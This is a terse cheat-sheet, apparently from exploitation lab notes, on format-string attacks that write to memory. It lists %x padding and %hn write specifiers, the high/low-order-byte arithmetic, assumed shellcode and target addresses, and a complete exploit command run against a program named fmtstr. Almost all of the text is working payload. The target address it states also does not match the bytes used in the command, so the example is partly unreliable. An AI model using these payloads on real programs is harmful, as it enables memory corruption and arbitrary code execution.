Writing To Memory
%.16086x
%[HOB - LOB]x
%[LOB - HOB]x
%4\$hn
%[offset+1]$hn
%[offset]$hn
%5\$hn
%[offset]$hn
%[offset+1]$hn
%.49143x
%.[LOB-8]x
%.[HOB-8]x
\xbe\x95\x04\x08\xbc\x95\x04\x08
[addr+2][addr]
[addr+2][addr]
Using examples from above
LOB < HOB
HOB < LOB
Assuming our shellcode is 0xbffffed5, HOB is 0xbfff and LOB is 0xfed5,
and that the target address is 0x080495bc
./fmtstr `printf “\xe6\x95\x04\x08\xe4\x95\x04\x08”`%.49143x%4\$hn%.16086x%5\$hn